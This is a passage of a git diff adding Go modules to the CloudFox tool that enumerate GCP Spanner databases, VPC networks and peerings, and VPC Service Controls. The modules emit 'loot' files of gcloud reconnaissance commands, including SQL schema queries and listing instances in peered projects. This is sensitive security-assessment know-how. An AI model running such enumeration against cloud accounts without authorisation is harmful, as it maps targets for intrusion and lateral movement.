proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "source-repos", + Header: header, + Body: body, + }, + } + + output := SourceReposOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SOURCEREPOS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/spanner.go b/gcp/commands/spanner.go new file mode 100644 index 00000000..92bdb1e4 --- /dev/null +++ b/gcp/commands/spanner.go @@ -0,0 +1,323 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + spannerservice "github.com/BishopFox/cloudfox/gcp/services/spannerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSpannerCommand = &cobra.Command{ + Use: globals.GCP_SPANNER_MODULE_NAME, + Aliases: []string{"cloud-spanner"}, + Short: "Enumerate Cloud Spanner instances and databases", + Long: `Enumerate Cloud Spanner instances and databases with IAM bindings. 
+ +Features: +- Lists all Spanner instances with configuration details +- Shows databases within each instance with encryption info +- Enumerates IAM bindings at both instance and database levels +- Generates gcloud commands for further analysis`, + Run: runGCPSpannerCommand, +} + +type SpannerModule struct { + gcpinternal.BaseGCPModule + Instances []spannerservice.SpannerInstanceInfo + Databases []spannerservice.SpannerDatabaseInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type SpannerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SpannerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SpannerOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPSpannerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SPANNER_MODULE_NAME) + if err != nil { + return + } + + module := &SpannerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []spannerservice.SpannerInstanceInfo{}, + Databases: []spannerservice.SpannerDatabaseInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *SpannerModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SPANNER_MODULE_NAME, m.processProject) + + if len(m.Instances) == 0 { + logger.InfoM("No Spanner instances found", globals.GCP_SPANNER_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d Spanner instance(s) with %d database(s)", + len(m.Instances), len(m.Databases)), globals.GCP_SPANNER_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *SpannerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Spanner in project: %s", projectID), 
globals.GCP_SPANNER_MODULE_NAME) + } + + svc := spannerservice.New() + result, err := svc.ListInstancesAndDatabases(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SPANNER_MODULE_NAME, + fmt.Sprintf("Could not list Spanner instances in project %s", projectID)) + return + } + + m.mu.Lock() + m.Instances = append(m.Instances, result.Instances...) + m.Databases = append(m.Databases, result.Databases...) + + for _, instance := range result.Instances { + m.addInstanceToLoot(instance) + } + for _, database := range result.Databases { + m.addDatabaseToLoot(database) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d instance(s) and %d database(s) in project %s", + len(result.Instances), len(result.Databases), projectID), globals.GCP_SPANNER_MODULE_NAME) + } +} + +func (m *SpannerModule) initializeLootFiles() { + m.LootMap["spanner-commands"] = &internal.LootFile{ + Name: "spanner-commands", + Contents: "# Spanner Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *SpannerModule) addInstanceToLoot(instance spannerservice.SpannerInstanceInfo) { + m.LootMap["spanner-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# INSTANCE: %s\n"+ + "# ==========================================\n"+ + "# Project: %s\n"+ + "# Display Name: %s\n"+ + "# Config: %s\n"+ + "# Nodes: %d\n"+ + "# State: %s\n", + instance.Name, instance.ProjectID, + instance.DisplayName, instance.Config, + instance.NodeCount, instance.State, + ) + + if len(instance.IAMBindings) > 0 { + m.LootMap["spanner-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range instance.IAMBindings { + m.LootMap["spanner-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + m.LootMap["spanner-commands"].Contents += fmt.Sprintf( + "\n# Describe instance:\n"+ + 
"gcloud spanner instances describe %s --project=%s\n\n"+ + "# List databases:\n"+ + "gcloud spanner databases list --instance=%s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud spanner instances get-iam-policy %s --project=%s\n\n", + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + ) +} + +func (m *SpannerModule) addDatabaseToLoot(database spannerservice.SpannerDatabaseInfo) { + m.LootMap["spanner-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# DATABASE: %s (Instance: %s)\n"+ + "# ------------------------------------------\n"+ + "# Project: %s\n"+ + "# State: %s\n"+ + "# Encryption: %s\n", + database.Name, database.InstanceName, + database.ProjectID, database.State, + database.EncryptionType, + ) + + if database.KmsKeyName != "" { + m.LootMap["spanner-commands"].Contents += fmt.Sprintf("# KMS Key: %s\n", database.KmsKeyName) + } + + if len(database.IAMBindings) > 0 { + m.LootMap["spanner-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range database.IAMBindings { + m.LootMap["spanner-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + m.LootMap["spanner-commands"].Contents += fmt.Sprintf( + "\n# Describe database:\n"+ + "gcloud spanner databases describe %s --instance=%s --project=%s\n\n"+ + "# Get database IAM policy:\n"+ + "gcloud spanner databases get-iam-policy %s --instance=%s --project=%s\n\n"+ + "# Execute SQL query:\n"+ + "gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql=\"SELECT * FROM INFORMATION_SCHEMA.TABLES\"\n\n", + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + ) +} + +func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Instance table - one row per IAM binding + instanceHeader := []string{ + 
"Project Name", + "Project ID", + "Instance", + "Display Name", + "Config", + "Nodes", + "State", + "IAM Role", + "IAM Member", + } + + var instanceBody [][]string + for _, instance := range m.Instances { + if len(instance.IAMBindings) > 0 { + for _, binding := range instance.IAMBindings { + instanceBody = append(instanceBody, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.DisplayName, + instance.Config, + fmt.Sprintf("%d", instance.NodeCount), + instance.State, + binding.Role, + binding.Member, + }) + } + } else { + // Instance with no IAM bindings + instanceBody = append(instanceBody, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.DisplayName, + instance.Config, + fmt.Sprintf("%d", instance.NodeCount), + instance.State, + "-", + "-", + }) + } + } + + // Database table - one row per IAM binding + databaseHeader := []string{ + "Project Name", + "Project ID", + "Instance", + "Database", + "State", + "Encryption", + "KMS Key", + "IAM Role", + "IAM Member", + } + + var databaseBody [][]string + for _, database := range m.Databases { + kmsKey := "-" + if database.KmsKeyName != "" { + kmsKey = database.KmsKeyName + } + + if len(database.IAMBindings) > 0 { + for _, binding := range database.IAMBindings { + databaseBody = append(databaseBody, []string{ + m.GetProjectName(database.ProjectID), + database.ProjectID, + database.InstanceName, + database.Name, + database.State, + database.EncryptionType, + kmsKey, + binding.Role, + binding.Member, + }) + } + } else { + // Database with no IAM bindings + databaseBody = append(databaseBody, []string{ + m.GetProjectName(database.ProjectID), + database.ProjectID, + database.InstanceName, + database.Name, + database.State, + database.EncryptionType, + kmsKey, + "-", + "-", + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && 
!strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "spanner-instances", + Header: instanceHeader, + Body: instanceBody, + }, + } + + if len(databaseBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "spanner-databases", + Header: databaseHeader, + Body: databaseBody, + }) + } + + output := SpannerOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SPANNER_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/vpcnetworks.go b/gcp/commands/vpcnetworks.go new file mode 100644 index 00000000..934f31eb --- /dev/null +++ b/gcp/commands/vpcnetworks.go @@ -0,0 +1,367 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + vpcservice "github.com/BishopFox/cloudfox/gcp/services/vpcService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPVPCNetworksCommand = &cobra.Command{ + Use: globals.GCP_VPCNETWORKS_MODULE_NAME, + Aliases: []string{"vpc", "networks", "net"}, + Short: "Enumerate VPC Networks", + Long: `Enumerate VPC Networks and related configurations. 
+ +Features: +- Lists all VPC networks and subnets +- Shows VPC peering connections +- Analyzes routing tables +- Checks for Private Google Access +- Identifies flow log configuration`, + Run: runGCPVPCNetworksCommand, +} + +type VPCNetworksModule struct { + gcpinternal.BaseGCPModule + Networks []vpcservice.VPCNetworkInfo + Subnets []vpcservice.SubnetInfo + Peerings []vpcservice.VPCPeeringInfo + Routes []vpcservice.RouteInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type VPCNetworksOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o VPCNetworksOutput) TableFiles() []internal.TableFile { return o.Table } +func (o VPCNetworksOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPVPCNetworksCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_VPCNETWORKS_MODULE_NAME) + if err != nil { + return + } + + module := &VPCNetworksModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Networks: []vpcservice.VPCNetworkInfo{}, + Subnets: []vpcservice.SubnetInfo{}, + Peerings: []vpcservice.VPCPeeringInfo{}, + Routes: []vpcservice.RouteInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *VPCNetworksModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_VPCNETWORKS_MODULE_NAME, m.processProject) + + if len(m.Networks) == 0 { + logger.InfoM("No VPC networks found", globals.GCP_VPCNETWORKS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d VPC network(s), %d subnet(s), %d peering(s), %d route(s)", + len(m.Networks), len(m.Subnets), len(m.Peerings), len(m.Routes)), globals.GCP_VPCNETWORKS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *VPCNetworksModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if 
globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating VPC networks in project: %s", projectID), globals.GCP_VPCNETWORKS_MODULE_NAME) + } + + svc := vpcservice.New() + + // Get networks + networks, err := svc.ListVPCNetworks(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCNETWORKS_MODULE_NAME, + fmt.Sprintf("Could not list VPC networks in project %s", projectID)) + } else { + m.mu.Lock() + m.Networks = append(m.Networks, networks...) + m.mu.Unlock() + } + + // Get subnets + subnets, err := svc.ListSubnets(projectID) + if err == nil { + m.mu.Lock() + m.Subnets = append(m.Subnets, subnets...) + m.mu.Unlock() + } + + // Get peerings + peerings, err := svc.ListVPCPeerings(projectID) + if err == nil { + m.mu.Lock() + m.Peerings = append(m.Peerings, peerings...) + m.mu.Unlock() + } + + // Get routes + routes, err := svc.ListRoutes(projectID) + if err == nil { + m.mu.Lock() + m.Routes = append(m.Routes, routes...) 
+ m.mu.Unlock() + } + + m.mu.Lock() + for _, network := range networks { + m.addNetworkToLoot(network) + } + for _, subnet := range subnets { + m.addSubnetToLoot(subnet) + } + for _, peering := range peerings { + m.addPeeringToLoot(peering) + } + m.mu.Unlock() +} + +func (m *VPCNetworksModule) initializeLootFiles() { + m.LootMap["vpcnetworks-commands"] = &internal.LootFile{ + Name: "vpcnetworks-commands", + Contents: "# VPC Networks Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *VPCNetworksModule) addNetworkToLoot(network vpcservice.VPCNetworkInfo) { + m.LootMap["vpcnetworks-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# NETWORK: %s\n"+ + "# ==========================================\n"+ + "# Project: %s\n"+ + "# Routing Mode: %s\n"+ + "# Auto Create Subnets: %v\n"+ + "# Subnets: %d\n"+ + "# Peerings: %d\n"+ + "\n# Describe network:\n"+ + "gcloud compute networks describe %s --project=%s\n\n"+ + "# List subnets in network:\n"+ + "gcloud compute networks subnets list --network=%s --project=%s\n\n"+ + "# List peerings:\n"+ + "gcloud compute networks peerings list --network=%s --project=%s\n\n", + network.Name, + network.ProjectID, + network.RoutingMode, + network.AutoCreateSubnetworks, + len(network.Subnetworks), + len(network.Peerings), + network.Name, network.ProjectID, + network.Name, network.ProjectID, + network.Name, network.ProjectID, + ) +} + +func (m *VPCNetworksModule) addSubnetToLoot(subnet vpcservice.SubnetInfo) { + m.LootMap["vpcnetworks-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# SUBNET: %s (Network: %s)\n"+ + "# ------------------------------------------\n"+ + "# Project: %s\n"+ + "# Region: %s\n"+ + "# CIDR: %s\n"+ + "# Private Google Access: %v\n"+ + "# Flow Logs: %v\n"+ + "\n# Describe subnet:\n"+ + "gcloud compute networks subnets describe %s --region=%s --project=%s\n\n", + subnet.Name, 
subnet.Network, + subnet.ProjectID, + subnet.Region, + subnet.IPCidrRange, + subnet.PrivateIPGoogleAccess, + subnet.EnableFlowLogs, + subnet.Name, subnet.Region, subnet.ProjectID, + ) +} + +func (m *VPCNetworksModule) addPeeringToLoot(peering vpcservice.VPCPeeringInfo) { + m.LootMap["vpcnetworks-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# PEERING: %s\n"+ + "# ------------------------------------------\n"+ + "# Project: %s\n"+ + "# Network: %s -> Peer Network: %s\n"+ + "# Peer Project: %s\n"+ + "# State: %s\n"+ + "# Export Routes: %v, Import Routes: %v\n", + peering.Name, + peering.ProjectID, + peering.Network, peering.PeerNetwork, + peering.PeerProjectID, + peering.State, + peering.ExportCustomRoutes, peering.ImportCustomRoutes, + ) + + // Cross-project peering commands + if peering.PeerProjectID != "" && peering.PeerProjectID != peering.ProjectID { + m.LootMap["vpcnetworks-commands"].Contents += fmt.Sprintf( + "\n# Cross-project peering - enumerate peer project:\n"+ + "gcloud compute instances list --project=%s\n"+ + "gcloud compute networks subnets list --project=%s\n\n", + peering.PeerProjectID, + peering.PeerProjectID, + ) + } else { + m.LootMap["vpcnetworks-commands"].Contents += "\n" + } +} + +func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Networks table + netHeader := []string{"Project Name", "Project ID", "Name", "Routing Mode", "Auto Subnets", "Subnets", "Peerings"} + var netBody [][]string + for _, network := range m.Networks { + autoSubnets := "No" + if network.AutoCreateSubnetworks { + autoSubnets = "Yes" + } + netBody = append(netBody, []string{ + m.GetProjectName(network.ProjectID), + network.ProjectID, + network.Name, + network.RoutingMode, + autoSubnets, + fmt.Sprintf("%d", len(network.Subnetworks)), + fmt.Sprintf("%d", len(network.Peerings)), + }) + } + tables = append(tables, internal.TableFile{ + Name: "vpc-networks", 
+ Header: netHeader, + Body: netBody, + }) + + // Subnets table + if len(m.Subnets) > 0 { + subHeader := []string{"Project Name", "Project ID", "Name", "Network", "Region", "CIDR", "Private Access", "Flow Logs"} + var subBody [][]string + for _, subnet := range m.Subnets { + privateAccess := "No" + if subnet.PrivateIPGoogleAccess { + privateAccess = "Yes" + } + flowLogs := "No" + if subnet.EnableFlowLogs { + flowLogs = "Yes" + } + subBody = append(subBody, []string{ + m.GetProjectName(subnet.ProjectID), + subnet.ProjectID, + subnet.Name, + subnet.Network, + subnet.Region, + subnet.IPCidrRange, + privateAccess, + flowLogs, + }) + } + tables = append(tables, internal.TableFile{ + Name: "subnets", + Header: subHeader, + Body: subBody, + }) + } + + // Peerings table + if len(m.Peerings) > 0 { + peerHeader := []string{"Project Name", "Project ID", "Name", "Network", "Peer Network", "Peer Project", "State", "Export Routes", "Import Routes"} + var peerBody [][]string + for _, peering := range m.Peerings { + peerProject := peering.PeerProjectID + if peerProject == "" { + peerProject = "-" + } + exportRoutes := "No" + if peering.ExportCustomRoutes { + exportRoutes = "Yes" + } + importRoutes := "No" + if peering.ImportCustomRoutes { + importRoutes = "Yes" + } + peerBody = append(peerBody, []string{ + m.GetProjectName(peering.ProjectID), + peering.ProjectID, + peering.Name, + peering.Network, + peering.PeerNetwork, + peerProject, + peering.State, + exportRoutes, + importRoutes, + }) + } + tables = append(tables, internal.TableFile{ + Name: "vpc-peerings", + Header: peerHeader, + Body: peerBody, + }) + } + + // Routes table (custom routes only, skip default) + var customRoutes []vpcservice.RouteInfo + for _, route := range m.Routes { + if !strings.HasPrefix(route.Name, "default-route-") { + customRoutes = append(customRoutes, route) + } + } + if len(customRoutes) > 0 { + routeHeader := []string{"Project Name", "Project ID", "Name", "Network", "Dest Range", "Next Hop Type", 
"Next Hop", "Priority"} + var routeBody [][]string + for _, route := range customRoutes { + routeBody = append(routeBody, []string{ + m.GetProjectName(route.ProjectID), + route.ProjectID, + route.Name, + route.Network, + route.DestRange, + route.NextHopType, + route.NextHop, + fmt.Sprintf("%d", route.Priority), + }) + } + tables = append(tables, internal.TableFile{ + Name: "custom-routes", + Header: routeHeader, + Body: routeBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := VPCNetworksOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_VPCNETWORKS_MODULE_NAME) + } +} diff --git a/gcp/commands/vpcsc.go b/gcp/commands/vpcsc.go new file mode 100644 index 00000000..5e4717d5 --- /dev/null +++ b/gcp/commands/vpcsc.go @@ -0,0 +1,344 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" + vpcscservice "github.com/BishopFox/cloudfox/gcp/services/vpcscService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var orgID string + +var GCPVPCSCCommand = &cobra.Command{ + Use: globals.GCP_VPCSC_MODULE_NAME, + Aliases: []string{"vpcsc", "service-controls", "sc"}, + Short: "Enumerate VPC Service Controls", + Long: `Enumerate VPC Service Controls configuration. 
+ +Features: +- Lists access policies for the organization +- Enumerates service perimeters (regular and bridge) +- Shows access levels and their conditions +- Identifies overly permissive configurations +- Analyzes ingress/egress policies + +Note: Organization ID is auto-discovered from project ancestry. Use --org flag to override.`, + Run: runGCPVPCSCCommand, +} + +func init() { + GCPVPCSCCommand.Flags().StringVar(&orgID, "org", "", "Organization ID (auto-discovered if not provided)") +} + +type VPCSCModule struct { + gcpinternal.BaseGCPModule + OrgID string + Policies []vpcscservice.AccessPolicyInfo + Perimeters []vpcscservice.ServicePerimeterInfo + AccessLevels []vpcscservice.AccessLevelInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type VPCSCOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o VPCSCOutput) TableFiles() []internal.TableFile { return o.Table } +func (o VPCSCOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPVPCSCCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_VPCSC_MODULE_NAME) + if err != nil { + return + } + + // Auto-discover org ID if not provided + effectiveOrgID := orgID + if effectiveOrgID == "" { + cmdCtx.Logger.InfoM("Auto-discovering organization ID...", globals.GCP_VPCSC_MODULE_NAME) + orgsSvc := orgsservice.New() + + // Method 1: Try to get org ID from project ancestry + if len(cmdCtx.ProjectIDs) > 0 { + discoveredOrgID, err := orgsSvc.GetOrganizationIDFromProject(cmdCtx.ProjectIDs[0]) + if err == nil { + effectiveOrgID = discoveredOrgID + cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered organization ID from project ancestry: %s", effectiveOrgID), globals.GCP_VPCSC_MODULE_NAME) + } + } + + // Method 2: Fallback to searching for accessible organizations + if effectiveOrgID == "" { + orgs, err := orgsSvc.SearchOrganizations() + if err == nil && len(orgs) > 0 { + // Extract org ID from name (format: 
"organizations/ORGID") + effectiveOrgID = strings.TrimPrefix(orgs[0].Name, "organizations/") + cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered organization ID from search: %s (%s)", effectiveOrgID, orgs[0].DisplayName), globals.GCP_VPCSC_MODULE_NAME) + } + } + + // If still no org ID found, error out + if effectiveOrgID == "" { + cmdCtx.Logger.ErrorM("Could not auto-discover organization ID. Use --org flag to specify.", globals.GCP_VPCSC_MODULE_NAME) + return + } + } + + module := &VPCSCModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + OrgID: effectiveOrgID, + Policies: []vpcscservice.AccessPolicyInfo{}, + Perimeters: []vpcscservice.ServicePerimeterInfo{}, + AccessLevels: []vpcscservice.AccessLevelInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *VPCSCModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM(fmt.Sprintf("Enumerating VPC Service Controls for organization: %s", m.OrgID), globals.GCP_VPCSC_MODULE_NAME) + + svc := vpcscservice.New() + + // List access policies + policies, err := svc.ListAccessPolicies(m.OrgID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + fmt.Sprintf("Could not list access policies for organization %s", m.OrgID)) + return + } + m.Policies = policies + + if len(m.Policies) == 0 { + logger.InfoM("No access policies found", globals.GCP_VPCSC_MODULE_NAME) + return + } + + // For each policy, list perimeters and access levels + for _, policy := range m.Policies { + perimeters, err := svc.ListServicePerimeters(policy.Name) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + fmt.Sprintf("Could not list perimeters for policy %s", policy.Name)) + } else { + m.Perimeters = append(m.Perimeters, perimeters...) 
+ } + + levels, err := svc.ListAccessLevels(policy.Name) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + fmt.Sprintf("Could not list access levels for policy %s", policy.Name)) + } else { + m.AccessLevels = append(m.AccessLevels, levels...) + } + } + + m.addAllToLoot() + + logger.SuccessM(fmt.Sprintf("Found %d access policy(ies), %d perimeter(s), %d access level(s)", + len(m.Policies), len(m.Perimeters), len(m.AccessLevels)), globals.GCP_VPCSC_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *VPCSCModule) initializeLootFiles() { + m.LootMap["vpcsc-commands"] = &internal.LootFile{ + Name: "vpcsc-commands", + Contents: "# VPC Service Controls Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *VPCSCModule) addAllToLoot() { + // Add policies to loot + for _, policy := range m.Policies { + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# POLICY: %s\n"+ + "# ==========================================\n"+ + "# Title: %s\n"+ + "# Parent: %s\n"+ + "\n# Describe access policy:\n"+ + "gcloud access-context-manager policies describe %s\n\n"+ + "# List perimeters:\n"+ + "gcloud access-context-manager perimeters list --policy=%s\n\n"+ + "# List access levels:\n"+ + "gcloud access-context-manager levels list --policy=%s\n\n", + policy.Name, policy.Title, policy.Parent, + policy.Name, policy.Name, policy.Name, + ) + } + + // Add perimeters to loot + for _, perimeter := range m.Perimeters { + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# PERIMETER: %s (Policy: %s)\n"+ + "# ------------------------------------------\n"+ + "# Title: %s\n"+ + "# Type: %s\n"+ + "# Resources: %d\n"+ + "# Restricted Services: %d\n"+ + "# Ingress Policies: %d\n"+ + "# Egress Policies: %d\n"+ + "\n# Describe perimeter:\n"+ + "gcloud access-context-manager perimeters describe %s 
--policy=%s\n\n"+ + "# List protected resources:\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=\"value(status.resources)\"\n\n", + perimeter.Name, perimeter.PolicyName, + perimeter.Title, perimeter.PerimeterType, + len(perimeter.Resources), len(perimeter.RestrictedServices), + perimeter.IngressPolicyCount, perimeter.EgressPolicyCount, + perimeter.Name, perimeter.PolicyName, + perimeter.Name, perimeter.PolicyName, + ) + } + + // Add access levels to loot + for _, level := range m.AccessLevels { + ipSubnets := "-" + if len(level.IPSubnetworks) > 0 { + ipSubnets = strings.Join(level.IPSubnetworks, ", ") + } + regions := "-" + if len(level.Regions) > 0 { + regions = strings.Join(level.Regions, ", ") + } + + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# ACCESS LEVEL: %s (Policy: %s)\n"+ + "# ------------------------------------------\n"+ + "# Title: %s\n"+ + "# IP Subnets: %s\n"+ + "# Regions: %s\n"+ + "# Members: %d\n"+ + "\n# Describe access level:\n"+ + "gcloud access-context-manager levels describe %s --policy=%s\n\n", + level.Name, level.PolicyName, + level.Title, ipSubnets, regions, len(level.Members), + level.Name, level.PolicyName, + ) + } +} + +func (m *VPCSCModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Access Policies table + if len(m.Policies) > 0 { + policyHeader := []string{"Policy", "Title", "Parent", "Created", "Updated"} + var policyBody [][]string + for _, policy := range m.Policies { + policyBody = append(policyBody, []string{ + policy.Name, + policy.Title, + policy.Parent, + policy.CreateTime, + policy.UpdateTime, + }) + } + tables = append(tables, internal.TableFile{ + Name: "vpcsc-policies", + Header: policyHeader, + Body: policyBody, + }) + } + + // Service Perimeters table + if len(m.Perimeters) > 0 { + perimeterHeader := []string{ + "Policy", "Name", "Title", "Type", "Resources", 
"Restricted Services", + "Ingress Policies", "Egress Policies", + } + var perimeterBody [][]string + for _, perimeter := range m.Perimeters { + perimeterBody = append(perimeterBody, []string{ + perimeter.PolicyName, + perimeter.Name, + perimeter.Title, + perimeter.PerimeterType, + fmt.Sprintf("%d", len(perimeter.Resources)), + fmt.Sprintf("%d", len(perimeter.RestrictedServices)), + fmt.Sprintf("%d", perimeter.IngressPolicyCount), + fmt.Sprintf("%d", perimeter.EgressPolicyCount), + }) + } + tables = append(tables, internal.TableFile{ + Name: "vpcsc-perimeters", + Header: perimeterHeader, + Body: perimeterBody, + }) + } + + // Access Levels table - one row per member + if len(m.AccessLevels) > 0 { + levelHeader := []string{"Policy", "Name", "Title", "IP Subnets", "Regions", "Member"} + var levelBody [][]string + for _, level := range m.AccessLevels { + ipSubnets := "-" + if len(level.IPSubnetworks) > 0 { + ipSubnets = strings.Join(level.IPSubnetworks, ", ") + } + regions := "-" + if len(level.Regions) > 0 { + regions = strings.Join(level.Regions, ", ") + } + + if len(level.Members) > 0 { + // One row per member + for _, member := range level.Members { + levelBody = append(levelBody, []string{ + level.PolicyName, + level.Name, + level.Title, + ipSubnets, + regions, + member, + }) + } + } else { + // Access level with no members + levelBody = append(levelBody, []string{ + level.PolicyName, + level.Name, + level.Title, + ipSubnets, + regions, + "-", + }) + } + } + tables = append(tables, internal.TableFile{ + Name: "vpcsc-access-levels", + Header: levelHeader, + Body: levelBody, + }) + } + + var 